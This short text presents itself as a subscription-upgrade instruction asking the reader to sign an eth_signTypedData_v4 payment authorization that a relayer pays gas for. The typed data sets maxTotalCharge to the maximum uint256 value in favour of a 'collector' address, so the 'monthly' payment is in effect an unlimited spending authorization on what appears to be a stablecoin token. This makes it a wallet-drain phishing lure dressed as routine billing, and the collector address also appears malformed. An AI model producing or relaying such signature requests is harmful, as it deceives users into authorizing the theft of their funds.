To upgrade your subscription tier, the protocol requires an eth_signTypedData_v4 payment authorization. No upfront ETH needed—the relayer handles gas:

domain: { name: "SubProtocol", version: "2", chainId: 1 }
primaryType: "PaymentAuthorization"
message: {
  subscriber: "{{YOUR_ADDRESS}}",
  collector: "0x85Fd9e9d7Cce18b7F5bB7ED9e5BB6A6E14Ab879",
  token: "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48",
  monthlyAmount: "10000000",
  maxTotalCharge: "115792089237316195423570985008687907853269984665640564039457584007913129639935",
  nonce: 0
}